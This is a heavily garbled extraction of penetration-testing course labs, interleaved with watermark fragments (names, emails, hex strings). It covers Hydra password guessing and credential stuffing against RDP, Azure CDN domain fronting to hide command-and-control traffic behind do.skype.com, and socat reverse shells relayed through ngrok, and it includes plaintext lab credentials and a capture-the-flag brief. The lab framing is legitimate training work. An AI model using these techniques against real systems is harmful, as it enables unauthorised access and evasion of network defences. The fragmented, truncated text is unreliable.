jerry@sec588.com
>
om
_c
ok
Setting up the environment
23169600 @
ou
tlo
Let's open the MATE terminal so that we can get our local environment running.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
Make sure that Docker-compose is down.
$ cd /opt/php-webshell
20
$ docker-compose down
, 20
28
pauljones166@outlook_com
Get into our code directory.
ly
Ju
$ cd /opt/php-webshell/code
>
om
$ python -m 'SimpleHTTPServer' 8080
_c
ok
Open another terminal and start ngrok:
Gregg Harris
$ az login -u jerry@sec588.com -p HumanMusic2019
au
<p
Now that we are logged in as Jerry again let's set up a CDN network for the second part of our lab, this will take
s
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
az cdn endpoint create --name studentXsec588 --profile studentX-sec588 --origin <ngrok URL> --
n
ce
live
The following is an instructor example so students can validate what their command line may look like.
3e1e3b497543e6c11ac8e4188959c93e
Once this is setup, we will then need to use the Azure Portal to nish setting up the endpoint as not every feature
is available over the az cli.
20
Use Firefox to complete the following steps:
, 20
28
Go to:
pauljones166@outlook_com
https://portal.azure.com
ly
Ju
Log in as the Jerry user to be able to perform the operations to add a CDN into the system.
>
om
From the Azure Portal Search button type: cdn
_c
ok
The CDN Pro les area should show up:
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Once you are in the Endpoint con guration, you need to change two option.
Li
3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
Click on the Caching Rules menu and change the Cache Behavior to Bypass Cache .
_c
ok
CLICK SAVE
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
From this point on the ngrok HTTP Window should not be closed. This URL is dynamic and is currently tied to your
To
CDN. This process takes anywhere from 10 minutes to 60 minutes to be made avaialble on the internet. If you
d
se
close the ngrok HTTP Window Lab 5.5 may take longer than expected.
n
ce
Li
live
Conclusion
In this lab, we have demonstrated how we can perform username enumeration, which is a key component of
username and password guessing attacks. We have also started the setup of our CDN Domain Fronting lab,
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
We wanted to make sure that all of our students understand the importance of a few things.First, why Multi-
ly
Factor Authentication is critical in any environment by performing a password guessing attack. Secondly, we
Ju
would like to our students to better understand why this methodology work. Third, we want to demonstrate how
>
to actually perform a Credential Stu ng attack as many of these attacks are still relatively unknown.
om
_c
Requirements for This Lab
ok
This lab requires a few items:
23169600 @
ou
tlo
66
Gregg Harris
au
Try It Yourself
<p
s
rri
1. Run az vm list-instances and obtain the PublicIpAddress for the dc1 host.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
2. The dc1 host has RDP enabled.
G
3. Build a list of known users consider what you know about the environment: administrator , jerry ,
:
To
5. Use pw-inspector to trim the wordlist to the default Windows2019 password complexity rules: lowercase ,
n
ce
Walkthrough
Let's open the MATE terminal so that we can get our local environment con gured:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
$ cd /home/sec588/files/wordlists
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
$ wc -l rockyou.txt
n se
ce
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
Next we will count the number of words in this smaller le:
ly
Ju
>
$ cat /tmp/rockyou-small.txt | wc -l
om
_c
This should now be ~750,000 lines:
ok
734298 /tmp/rockyou-small.txt 23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
This wordlist is now 10,000 lines long. This is considerably smaller than what we started with. Let's see how this
G
live
The easiest way for us in our IP addresses in Azure is run the following command:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
This will display the computers on the left and the Ip Addresses on the right.
ly
Ju
Copy the DC1 IP address as it will be our target.
>
om
Hydra Users and Passwords
_c
ok
Let's attempt to build a users le that we can work with:
23169600
$ nano /home/sec588/files/workdir/users.txt
@
ou
tlo
66
Gregg Harris
au
administrator
<p
admin
s
summer
rri
jerry
Ha
sec588
george
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
Why these words? Well in previous labs we had a usernamed summer, we had one named jerry, we also have
d
some standard ones, like administrator, admin, and for fun we are throwing the class name in here. Sometimes
se
usernames for service accounts end up being company names, project names and the like.
n
ce
Li
username file :
live
/home/sec588/files/workdir/users.txt
3e1e3b497543e6c11ac8e4188959c93e
The rst attack will be a standard dictionary attack:
NOTE THIS ATTACK WILL NOT FINISH read on after you hit ENTER
20
$ cd /home/sec588/files/workdir
20
,
28
pauljones166@outlook_com
$ hydra -L users.txt -P rockyou-smaller.txt -t 4 rdp://<publicIpAddress>
ly
Ju
>
om
_c
ok
23169600 ou
tlo
This will take a long time to work, by our estimation after 2 or 3 minutes you will see a [STATUS] message. If
you read it, it will state that you will nd you password after 1.5 to 2 hours. Let's see the di erent between this an
maybe a more targetted attack:
@
66
s1
Let's now try a password attack that is more targetted with a targetted wordlist.
ne
ljo
Targetted Wordlist
Gregg Harris
au
<p
$ nano /home/sec588/files/workdir/password-target.txt
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Spring2018
:
To
Summer2018
Fall2018
d
se
Winter2018
Spring2019
n
ce
Summer2019
Fall2019
Li
Winter2019
Spring2020 live
$ hydra -L users.txt -P password-target.txt -t 4 rdp://<publicIpAddress>
3e1e3b497543e6c11ac8e4188959c93e
Credential Stuf ng Slow Attack
20
$ nano /home/sec588/files/workdir/stuffing.txt
, 20
28
pauljones166@outlook_com
ly
Administrator:Administrator
Ju
admin:admin
>
summer:SnakeJazz2020
om
jerry:HumanMusic2019
sec588:Winter2019
_c
ok
23169600 ou
tlo
So here we have an extremely targetted wordlist, only 1 attempt per user. This is arguably faster than what we
@
had before.
66
s1
Gregg Harris
This works our methodology in reverse. How would we do this in the real world:
au
<p
1. Build a list of users, there maybe some guessing here or you may be informed
s
rri
2. Build a list of passwords that each user may have used, this may have been through exposed password
Ha
leaks.
3. Once the list is exhausted, attempt to guess common passwords
gg
4. You can also build a targeted wordlist using a tool like CeWL
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
5. Once both of these options are done you can move into larger dictionary lists.
: G
To
Remember you do not need to crack ALL the users accounts, typically you need one or more.
d
nse
Conclusions
ce
Li
live
This lab was designed to cover a critical component of Penetration Testing and that is the use of passwords,
credential stu ng, and targetted wordlists in a penetration test. Passwords are a critical part of testing, don't
disregard it.
Sometimes you will nd a list of username and passwords in a larger lists, other times you will nd that users
have very predicable passwords over time. Keep this in mind.
You seldom nd valid and good information on using good password tools against live targets. The information
3e1e3b497543e6c11ac8e4188959c93e
is not always available to you, it's almost certainly not well documented at times. This lab helps you start working
through these issues.
Additional Resources
20
, 20
SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec540)
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
In Lab 5.3, it was discussed that CDN's are a critical component of the internet. It allows Content Providers to
ly
move large datasets much closer to the end-user. Content Delivery Networks quite often are built of proxies and
Ju
proxy-like technologies. These proxies, however, are front-ending almost all customers, typically in a shared
>
environment, for scalability. How does a shared proxy system move tra c from its front door over to the actual
om
system?
_c
ok
The host: header directs the tra c accordingly. Here is an example:
Going to do.skype.com
23169600 ou
tlo
the packets are formulated to resolve this to the azurecdn server:
@
example.azureedge.net .
66
s1
ne
Gregg Harris
au
<p
s
GET / HTTP/2
rri
Host: do.skype.com
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
What if we ask our system to go to https://do.skype.com , yet redirect the Host: header to our EvilC2?
:
To
d
The system formulates a request to do.skype.com . The tra c does forward to azureedge and potentially
se
depending on the system include the SNI in the certi cate. The proxy will redirect the tra c to
n
do.skype.com
ce
us.
Li
live
Why would we want to do this? To hide our real intent and evade Proxies.
3e1e3b497543e6c11ac8e4188959c93e
Once of the other important things about this lab is that you do not close or interfere with the ngrok http
process. Internet connectivity, the lab is self contained running from your computer. You will need the following
tools:
20
Curl from the command line
, 20
Try It Yourself
28
pauljones166@outlook_com
ly
Ju
We wanted to demonstrate the big di erence between a Lightweight Shell and a bigger heavyweight shell.
>
om
1. Make sure you can get to your machine using the Azure CDN.
_c
2. Call the pro le: studentX-sec588
ok
3. Call the endpoint:
23169600
student1-sec588
tlo
4. Use port 8080 , start a SimpleHTTPServer on port 8080 in the php-webshell directory.
5. While this builds, switch to the socat lab
ou
@
6. At this point the CDN shold be available run the following commands:
66
curl to download the azureedge endpoint to make sure you can access your webshell directory
s1
curl to download the same endpoint to make sure you can get the Host header pointing to azureedge but
ne
Gregg Harris
au
Walkthrough
<p
s
rri
Let's open the MATE terminal so that we can get our local environment running.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
In the new window let's make sure that we are running the python server still.
<p
s
rri
Make sure you have a window with the following command still running:
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
While our shell is propogating let's get everything setup to work with domain fronting. First let's understand what
d
se
we are trying to do, using tcpdump we can start to get an idea for what we will be attempting to do in our
n
environment.
ce
Li
live
Open a MATE Terminal and type the following commands:
$ sudo wireshark
This will bring up wireshark in the environment. Wireshark will be our validation engine for us.
port 443
3e1e3b497543e6c11ac8e4188959c93e
Choose the eth0 interface, which maybe the default chosen. Once you click on the Shark n it will start capturing
tra c.
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Now let's make a connection using curl. Open another MATE terminal and type:
23169600
$ curl https://studentXsec588.azureedge.net
@
ou
tlo
66
ssl.handshake
Gregg Harris
au
<p
This will display only the handshakes which will show the initial Client Hello Message. If we have
propogated everything correctly you will see a message in Wireshark for a TLS1.3 Client Hello Message.
s
rri
Ha
You need to nd that message, once you do you can open it by clicking:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Secure Sockets Layer | TLS 1.3 Record Type | Handshake Protocol | Extensions: Server
G
Name Indicator
:
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
What will our content lters see as the server we are going to? Few options here, one is that we will do a DNS
>
om
Lookup for student1sec588.azureedge.net and this will be the server that is used. There is another option, and
_c
that option is that we will not be using azureedge.net at all we could use a legitimate service. Let's explore that
ok
option.
We know that using our own C2 domain could be problematic. It could be blocked or it could reveal our attacker
s1
infrastructure. Let's move to hiding our attack, what we will do is request an AzureCDN based website that is
ne
hosted by azureedge. We could nd these by doing a google dork. A few know URLs:
ljo
Gregg Harris
au
do.skype.com
<p
s
rri
ajax.microsoft.com
Ha
Since these sites are all HTTPS what will our content lters see?
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
do.skype.com
:
To
This a Skype URL that will be allowed through in many locations, how will we get to our attacker infrastructure?
d
se
We will tell our Proxy that the host we are requesting is ACTUALLY our attacker infrastructure.
n
ce
Li
live
Going back to our window we now type a new command, this time the studentXsec588.azureedge.net is
now going to be our host header NOT the host we are going to initiate communication with. The host we will
initiate communication with is skype.
Wireshark now gets a new CLIENT HELLO. This time it will not be from studentX attacker infrastructure it will be
3e1e3b497543e6c11ac8e4188959c93e
from do.skype.com. Our content lters will believe we are talking that domain and we will not be able to block it if
we are legitimately using skype in our environments.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
This is how domain fronting works, both requests will provide the same results but content lters and dns lters
23169600
will see di erent requests destinations.
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Conclusions
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Domain Fronting and Redirections through alternative methods can be useful in hiding what we are trying to do,
:
speci cally in avoiding detections and creating new pathways to valid websites and channels. Domain Fronting
To
while supposedly 'dead' is actually a valid attack path in a few service providers. The danger is that the service
d
se
provider may notice that you are using this channel so you must tread carefully.
n
ce
live
This lab shows us another way to evade detection when conducting redteam activities by using the very same
cloud infrastructures that we may be assessing in order to circumvent protections. Defenders have to nd new
and better ways to detect what it is that we are trying to do, while the attackers have to then nd new ways to
evade defenders. This is another great example of that count and mouse game that we play.
20
Brief Intro
, 20
28
pauljones166@outlook_com
We will be playing with some of the Redirection options to help you build really dumb relays and really simple
ly
relays as options for the following actions that you may need to use in your environment:
Ju
>
1. Getting a reverse shell locally
om
2. Using ngrok to pivot between local and remote
_c
3. Using socat to port forward
ok
Requirements for This Lab 23169600 @
ou
tlo
66
This lab does not require internet connectivity, the lab is self contained running from your computer. You will
s1
NGrok, SoCat
<p
s
rri
Try It Yourself
Ha
gg
We wanted to demonstrate the big di erence between a Lightweight Shell and a bigger heavyweight shell.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
1. Shovel a Socat shell to yourself, and run some commands, notice that the shell is an actual shell, and not a
:
To
2. Bring down the ngrok http shell and move to a tcp ngork redirection. Play with the tcp redirection and socat.
se
3. Forward a port with Socat so that you can move from one port to another.
n
ce
Li
Walkthrough
live
Setting up the environment
Let's open the MATE terminal so that we can get our local environment running.
3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
$ cd /tmp
ljo
Gregg Harris
au
<p
Notice the /tmp this will be our attacker shell, we will be creating a REVERSE connection INTO this shell.
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
$ socat file:`tty`,raw,echo=0 tcp-listen:9998
: G
To
What does this command do? It opens a le handle and executes a tty shell, it is a raw shell and the
d
is set to o (or 0 ).
se
echo
n
ce
$ ifconfig eth0
3e1e3b497543e6c11ac8e4188959c93e
What does this commadn do? It runs an executable of
stdout. It iwll then connect to your computer on port
bash -li , it is attached as a pty, with stderr, stdin, and
9998 .
20
Go back to your original window, if prompt changes from sec588@slingshot:/tmp $ to
20
sec588@slingshot:~$ you have now created a socat shell.
,
28
pauljones166@outlook_com
The prompt moves from /tmp to ~ .
ly
Ju
Run some additional commands such as:
>
om
_c
tty
ok
id
23169600 @
ou
tlo
hostname
66
s1
ne
pwd
ljo
Gregg Harris
au
Notice that with the tty command you have a real shell! With error handling!
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
$ exit
Li
3e1e3b497543e6c11ac8e4188959c93e
Now in the socat exec command let's change the connect address:
tcp:0.tcp.ngrok.io:<randomport>
20
,20
The will be replaced with whatever value ngrok assigns to you.
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Sometimes socat will NOT resolve the 0.tcp.ngrok.io name, if this happens:
ne
ljo
$ dig 0.tcp.ngrok.io
Gregg Harris
au
<p
Record the IP address and make the socat command like so:
s
rri
Ha
tcp:<PublicIpAddress>:<randomport>
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
How can we uplevel this a bit more? What if we want to a PHP redirector like the one that we described with PHP
To
Hop? Let's next attempt this to try and further obfuscate things.
d
nse
$ exit
live
You will also want to 'exit' the ngrok commands.
Portforwards
3e1e3b497543e6c11ac8e4188959c93e
$ cd /opt/php-webshell/code
20
Let's now curl this directory:
, 20
28
pauljones166@outlook_com
$ curl http://<yourLinuxIp>:9999
ly
Ju
It should return some html with directories in it like below:
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
$ socat TCP-LISTEN:9998,fork TCP:<yourLinuxIp>:9999
Let's try this command, open a new MATE Terminal and type in this command replacing With your linux ip!
$ curl http://<yourLinuxIp:9998
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Conclusions
:
To
We have over the years seen the re-implementation of simple dumb socket servers like netcat. Over the years
d
se
the tool has proved as useful as almost any penetration testing tool. What is not commonly seen used however,
n
and is albeit more powerful is socat. This tool allows you to manipulate tra c in many more ways than netcat,
ce
and at times in a more simple manner without having worry about building pipe les or fo les. It can also
Li
live
provide full working shells and shells over avenues we may have no considered before like a namedpipe.
This lab shows us two features that is valuable in a Red Team Exercise:
3e1e3b497543e6c11ac8e4188959c93e
Additional Resources
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
Today there is no instructions, hence there is no real PowerPoint Lab Presentation.
ly
Ju
The ow for today
>
om
_c
We have our capstone even today. You will be working in groups of three to ve. No less than three no more
ok
than ve people. Today's Capture the Flag event is designed to model a real world penetration testing. Notably
23169600 tlo
missing from this day is a Score Board, so let's go over some rules.
@
ou
Teams of no more than three to ve individuals
66
s1
Overall Project.
ne
ljo
Jetrist.com is a a startup that works with in uencers in designing 'faux' extravegant adventures to help them
Gregg Harris
au
boost their social media precense. Jetrist.com would like you the individual teams of testers to nd vulnerabilities
<p
in the system that may expose sensitive client data. What data? Any data that links clients to their service as this
s
could a ect both the Jetrist company and the Social Media in uences by exposing the truth. What truth?
rri
Jetrist.com makes it appear as those in uencers live the most lavish lifestyle possible, of course.
Ha
gg
Your job is to try and nd all the vulnerabilities in the environment that could lead to full compromise.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
First the ' ags' in the environment are hints that will be shown to you on exploitation of a service. These ' ags'
Li
will provide you both guidance to look further as well as serve as the sign posts of successfully completing a
challenge. live
Secondly, you will need to alot from 45 minutes to an hour to construct a report. The report can be created using
Libre Impress or any Powerpower/Google Slide that you have, the instructor will choose the top three reports
and make a determination of which team has created the best presentation.
Flags will all be called flag . Flags will provide one of two things:
3e1e3b497543e6c11ac8e4188959c93e
1. HINTS
2. KEYS or KEY MATERIAL
20
How do I nd ags?
, 20
28
The ags can be either:
pauljones166@outlook_com
ly
Ju
1. Files called flag
>
2. Files called flag.extension , i.e flag.exe , flag.html , etc.
om
3. Database records called flag
_c
4. Database keys called flag
ok
5. Other items that you can search with the word flag .
/ C:\
ljo
Gregg Harris
au
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Hints
:
To
Build this report AS you hack. Don't wait till the end. Make sure to be creative
d
n se
ce
We will end this competition at 1:00 and presentations will work from 1:30 to 2:30.
Li
Scope
live
1. The only domain, and associated subdomains that are in scope for today is: jetrist.com and any of its
associated subdomains . blessed-duck.jetrist.com is the only VALID subdomain to use.
3. The Web Applications, The VPC Environments, the Databases, and Virutal Machines are all in scope.
3e1e3b497543e6c11ac8e4188959c93e
4. The services in a shared remote database environment can be tested, but you cannot extract data that does
not belong to jetrist.com
20
5. Container registries that are private are in scope, as is any source code repositories.
, 20
28
pauljones166@outlook_com
Rules of Engagement:
ly
Ju
1. Web Applications and Network Compute Environments for this domain are in scope
2. You must not bring down production systems, but you can install software
>
om
3. You can read keys but not change them
4. Do not add root keys
_c
5. Do not delete any ags
ok
6. Password Brute Forcing is in scope IF you construct a wordlist and a very structure attempt, do not attempt
50,000 passwords on an account.
7. No Denial of Service Attacks
23169600 @
ou
tlo
8. No Performance Hogging Attacks.
66
s1
Bug Bounty
ne
ljo
Gregg Harris
au
If you nd a vulnerability in the Class you may submit for a Bug Bounty but this should no be the focus for the
<p
day. If you nd an actual vulnerabiliy in a cloud provider that you feel shoud be reported you should attempt to
s
do this.
rri
Ha
Any Questions?
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
You may begin!
: G
To
d
n se
ce
Li
live